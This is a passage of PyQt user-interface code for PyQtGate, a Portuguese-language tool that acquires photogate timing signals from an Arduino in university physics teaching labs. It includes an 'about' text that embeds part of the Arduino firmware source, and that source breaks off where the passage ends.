font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.pB_closeconnection = QtGui.QPushButton(self.tab_serial)
self.pB_closeconnection.setGeometry(QtCore.QRect(70, 210, 98, 27))
self.pB_closeconnection.setObjectName(_fromUtf8("pB_closeconnection"))
self.layoutWidget = QtGui.QWidget(self.tab_serial)
self.layoutWidget.setGeometry(QtCore.QRect(71, 141, 231, 29))
self.layoutWidget.setObjectName(_fromUtf8("layoutWidget"))
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.layoutWidget)
self.horizontalLayout_2.setMargin(0)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label = QtGui.QLabel(self.layoutWidget)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout_2.addWidget(self.label)
self.cB_port = QtGui.QComboBox(self.layoutWidget)
self.cB_port.setObjectName(_fromUtf8("cB_port"))
self.horizontalLayout_2.addWidget(self.cB_port)
self.label_25 = QtGui.QLabel(self.tab_serial)
self.label_25.setGeometry(QtCore.QRect(70, 270, 101, 17))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_25.setFont(font)
self.label_25.setObjectName(_fromUtf8("label_25"))
self.l_commstatus = QtGui.QLabel(self.tab_serial)
self.l_commstatus.setGeometry(QtCore.QRect(180, 270, 491, 17))
self.l_commstatus.setObjectName(_fromUtf8("l_commstatus"))
self.tabPrincipal.addTab(self.tab_serial, _fromUtf8(""))
self.tab_sobre = QtGui.QWidget()
self.tab_sobre.setObjectName(_fromUtf8("tab_sobre"))
self.l_ufscar = QtGui.QLabel(self.tab_sobre)
self.l_ufscar.setGeometry(QtCore.QRect(160, 370, 180, 125))
self.l_ufscar.setObjectName(_fromUtf8("l_ufscar"))
self.l_cca = QtGui.QLabel(self.tab_sobre)
self.l_cca.setGeometry(QtCore.QRect(567, 368, 130, 122))
self.l_cca.setObjectName(_fromUtf8("l_cca"))
self.label_3 = QtGui.QLabel(self.tab_sobre)
self.label_3.setGeometry(QtCore.QRect(530, 497, 211, 17))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial Black"))
font.setPointSize(10)
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.textBrowser = QtGui.QTextBrowser(self.tab_sobre)
self.textBrowser.setGeometry(QtCore.QRect(80, 40, 681, 321))
self.textBrowser.setObjectName(_fromUtf8("textBrowser"))
self.tabPrincipal.addTab(self.tab_sobre, _fromUtf8(""))
self.l_filename = QtGui.QLabel(PyQtGate)
self.l_filename.setGeometry(QtCore.QRect(290, 12, 561, 17))
self.l_filename.setObjectName(_fromUtf8("l_filename"))
self.retranslateUi(PyQtGate)
self.tabPrincipal.setCurrentIndex(0)
self.tab_views.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(PyQtGate)
def retranslateUi(self, PyQtGate):
PyQtGate.setWindowTitle(_translate("PyQtGate", "PyQtGate", None))
self.tab_mostrador.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Mostrar dados de aquisição</p></body></html>", None))
self.pB_startacq.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Inicia e interrompe a aquisição de sinal do Photogate</p></body></html>", None))
self.pB_startacq.setText(_translate("PyQtGate", "Iniciar", None))
self.l_mostrador.setText(_translate("PyQtGate", "parada", None))
self.label_7.setText(_translate("PyQtGate", "Aquisição:", None))
self.vS_channel_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 1</p></body></html>", None))
self.lE_channel_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 1</p></body></html>", None))
self.lE_channel_1.setText(_translate("PyQtGate", "512", None))
self.vS_channel_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 2</p></body></html>", None))
self.lE_channel_2.setText(_translate("PyQtGate", "512", None))
self.lE_channel_5.setText(_translate("PyQtGate", "512", None))
self.lE_channel_4.setText(_translate("PyQtGate", "512", None))
self.lE_channel_3.setText(_translate("PyQtGate", "512", None))
self.lE_channel_6.setText(_translate("PyQtGate", "512", None))
self.vS_channel_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 4</p></body></html>", None))
self.vS_channel_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 3</p></body></html>", None))
self.vS_channel_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 5</p></body></html>", None))
self.vS_channel_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Nível de referência para disparo de tempo do Canal 6</p></body></html>", None))
self.sP_channel_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.lE_time_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_1.setText(_translate("PyQtGate", "0", None))
self.sP_channel_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.lE_time_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_5.setText(_translate("PyQtGate", "0", None))
self.cB_subida_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_4.setText(_translate("PyQtGate", "Subida", None))
self.cB_descida_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_2.setText(_translate("PyQtGate", "Descida", None))
self.l_channel_8.setText(_translate("PyQtGate", "segundos", None))
self.sP_channel_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.l_channel_12.setText(_translate("PyQtGate", "segundos", None))
self.l_channel_9.setText(_translate("PyQtGate", "segundos", None))
self.cB_subida_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_1.setText(_translate("PyQtGate", "Subida", None))
self.l_channel_10.setText(_translate("PyQtGate", "segundos", None))
self.lE_time_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_3.setText(_translate("PyQtGate", "0", None))
self.cB_descida_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_5.setText(_translate("PyQtGate", "Descida", None))
self.l_channel_11.setText(_translate("PyQtGate", "segundos", None))
self.cB_descida_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_6.setText(_translate("PyQtGate", "Descida", None))
self.cB_subida_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_3.setText(_translate("PyQtGate", "Subida", None))
self.sP_channel_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.sP_channel_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.cB_subida_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_2.setText(_translate("PyQtGate", "Subida", None))
self.sP_channel_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Varre os tempos disparados.</p></body></html>", None))
self.cB_descida_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_4.setText(_translate("PyQtGate", "Descida", None))
self.cB_subida_5.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_5.setText(_translate("PyQtGate", "Subida", None))
self.cB_descida_3.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_3.setText(_translate("PyQtGate", "Descida", None))
self.cB_subida_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na subida em relação à referência</p></body></html>", None))
self.cB_subida_6.setText(_translate("PyQtGate", "Subida", None))
self.l_channel_7.setText(_translate("PyQtGate", "segundos", None))
self.lE_time_6.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_6.setText(_translate("PyQtGate", "0", None))
self.lE_time_2.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_2.setText(_translate("PyQtGate", "0", None))
self.cB_descida_1.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Marca os tempos de disparo na descida em relação à referência</p></body></html>", None))
self.cB_descida_1.setText(_translate("PyQtGate", "Descida", None))
self.lE_time_4.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Tempo de disparo</p></body></html>", None))
self.lE_time_4.setText(_translate("PyQtGate", "0", None))
self.tab_views.setTabText(self.tab_views.indexOf(self.tab_separados), _translate("PyQtGate", "Separados", None))
self.pW_all.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Gráfico de amostragem dos seis canais em que a ordenada (restrita ao intervalo de 0 a 1023) é porporcional à voltagem medida nas respectivas portas óticas e a abscissa corresponde ao tempo em segundos.</p></body></html>", None))
self.tW_timetable.setToolTip(_translate("PyQtGate", "<html><head/><body><p><span style=\" font-weight:400;\">Tabela de tempos (em segundos) de disparo dos canais selecionados. Tempos positivos referem-se à subida e negativos à descida.</span></p></body></html>", None))
self.pB_timetable.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Gera tabela de tempos de disparo na subida e/ou descida conforme os níveis de referência de cada canal</p></body></html>", None))
self.pB_timetable.setText(_translate("PyQtGate", "Gerar tempos", None))
self.tab_views.setTabText(self.tab_views.indexOf(self.tab_juntos), _translate("PyQtGate", "Juntos", None))
self.cB_constrain.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Vincula os controles de referência ao canal 1</p></body></html>", None))
self.cB_constrain.setText(_translate("PyQtGate", "Vincular ao canal 1", None))
self.cB_channel_1.setText(_translate("PyQtGate", "Canal 1", None))
self.cB_channel_2.setText(_translate("PyQtGate", "Canal 2", None))
self.cB_channel_3.setText(_translate("PyQtGate", "Canal 3", None))
self.cB_channel_4.setText(_translate("PyQtGate", "Canal 4", None))
self.cB_channel_5.setText(_translate("PyQtGate", "Canal 5", None))
self.cB_channel_6.setText(_translate("PyQtGate", "Canal 6", None))
self.label_8.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Atraso adicional entre cada aquisição (0 a 65535 ms)</p></body></html>", None))
self.label_8.setText(_translate("PyQtGate", "Atraso:", None))
self.lE_delay.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Atraso adicional entre cada aquisição (0 a 65535 ms)</p></body></html>", None))
self.lE_delay.setText(_translate("PyQtGate", "0", None))
self.label_9.setText(_translate("PyQtGate", "ms", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_mostrador), _translate("PyQtGate", "Mostrador", None))
self.pB_save.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Salva arquivo com as formas de onda completas de todos os canais</p></body></html>", None))
self.pB_save.setText(_translate("PyQtGate", "Salvar formas de onda", None))
self.pB_load.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Lê arquivo com as formas de onda completas</p></body></html>", None))
self.pB_load.setText(_translate("PyQtGate", "Ler formas de onda", None))
self.pB_savetime.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Salva arquivo com os tempos de disparo dos canais selecionados de acordo com a tabela de tempos</p></body></html>", None))
self.pB_savetime.setText(_translate("PyQtGate", "Salvar tabela de tempos", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_arquivo), _translate("PyQtGate", "Arquivo", None))
self.pB_connect.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Seleciona automaticamente a porta USB em que a placa Arduino está conectada. É necessário que a Arduino esteja pré-carregada com o código Photogate específico.</p></body></html>", None))
self.pB_connect.setText(_translate("PyQtGate", "Selecionar porta automaticamente", None))
self.label_2.setText(_translate("PyQtGate", "Comunicação serial com Arduino", None))
self.pB_closeconnection.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Interrompa a conexão com a placa Arduino.</p></body></html>", None))
self.pB_closeconnection.setText(_translate("PyQtGate", "Interromper", None))
self.label.setText(_translate("PyQtGate", "Selecionar da lista:", None))
self.cB_port.setToolTip(_translate("PyQtGate", "<html><head/><body><p>Selecione de uma lista a porta USB em que a placa Arduino está conectada. É necessário que a Arduino esteja pré-carregada com o código Photogate específico.</p></body></html>", None))
self.label_25.setText(_translate("PyQtGate", "Comunicação:", None))
self.l_commstatus.setText(_translate("PyQtGate", "não iniciada", None))
self.tabPrincipal.setTabText(self.tabPrincipal.indexOf(self.tab_serial), _translate("PyQtGate", "Serial", None))
self.l_ufscar.setText(_translate("PyQtGate", "TextLabel", None))
self.l_cca.setText(_translate("PyQtGate", "TextLabel", None))
self.label_3.setText(_translate("PyQtGate", "Centro de Ciências Agrárias", None))
self.textBrowser.setHtml(_translate("PyQtGate", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:12pt; font-weight:600;\">PyQtGate</span></p>\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt; font-weight:600;\">Last update: Mar 03 2017</span></p>\n"
"<p align=\"center\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:12pt; font-weight:600;\"><br /></p>\n"
"<p align=\"justify\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">PyQtGate tem como objetivo oferecer uma interface gráfica para o hardware de portas óticas utilizado nos Laboratórios de Ensino de Física do Centro de Ciências Agrárias da Universidade Federal de São Carlos (CCA-UFSCar).</span></p>\n"
"<p align=\"justify\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p align=\"justify\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">PyQtGate foi desenvolvido em PyQt e deve ser utilizado em conjunto com os hardwares de aquisição do sistema de portas óticas composto por: (i) placa de prototipagem Arduino Uno, (ii) Photogate Shield para Arduino Uno e (iii) conjunto de sensores óticos. A placa Arduino deve ser carregada com o código específico APGate, cuja cópia encontra-se abaixo. Com excessão da placa Arduino, todas as peças de hardware e todos os softwares foram desenvolvidos no CCA-UFSCar.</span></p>\n"
"<p align=\"justify\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p align=\"justify\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">O Shield Photogate para Arduino foi desenvolvido usando a ferramenta online para criação de circuitos eletrônicos EasyEDA e encontra-se disponível em: https://easyeda.com</span></p>\n"
"<p align=\"justify\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">João Teles</span></p>\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">jteles@cca.ufscar.br</span></p>\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:10pt;\">Outubro/2016</span></p>\n"
"<p align=\"right\" style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:10pt;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">/*APGate: Arduino PhotoGate para uso nos dispositivos de portas óticas dos Laboratórios</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">de Ensino de Física do CCA-UFSCar.</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Esse codigo deve ser carregado na placa Arduino UNO que deve operar em conjunto</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">com os hardwares Shield Photogate e sensores óticos. A comunicao deve ser feita com</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">o software PyQtGate.</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Joao Teles, jteles@cca.ufscar.br</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Last update: Mar 03 2017</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">--------------------------------</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 0: canal 1</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 1: canal 2</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 2: canal 3</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 3: canal 4</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 4: canal 5</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Analog pin 5: canal 6</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">*/</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">//Defines for setting and clearing register bits for faster analog readings</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#ifndef cbi</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#define cbi(sfr, bit) (_SFR_BYTE(sfr) &= ~_BV(bit))</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#endif</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#ifndef sbi</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#define sbi(sfr, bit) (_SFR_BYTE(sfr) |= _BV(bit))</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">#endif</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_co[9] = "Photo_co"; //Signal from pc asking to connect</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_ok[9] = "Photo_ok"; //Connection confirmation signal from arduino to pc</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_st[9] = "Photo_st"; //Signal from pc confirming sequence start</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">char msg_t[9] = "01234567";</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">int i, v;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">int y[7];</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">unsigned char a, b;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">unsigned char a3, a2, a1, a0;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">unsigned long t0, t;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void erase_msg_t(void);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void setup() {</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> // set prescale to 16 (128 is the default) for improving analog reading time:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> sbi(ADCSRA,ADPS2) ;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> cbi(ADCSRA,ADPS1) ;</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> cbi(ADCSRA,ADPS0) ;</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.begin(115200);</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">}</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">void loop() {</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> //Read command message from pc:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> if (Serial.available() > 7)</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 8; i++) msg_t[i] = Serial.read();</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> //Confirmation of pc-arduino communication:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> if (strcmp(msg_t, msg_co) == 0) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> for (i = 0; i < 8; i++) </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> Serial.write(msg_ok[i]);</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> }</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> //Acquisition start:</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> if (strcmp(msg_t, msg_st) == 0) {</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> </p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> while (Serial.available() < 2) {}</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> a = Serial.read();</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> b = Serial.read();</p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"> </p>\n"
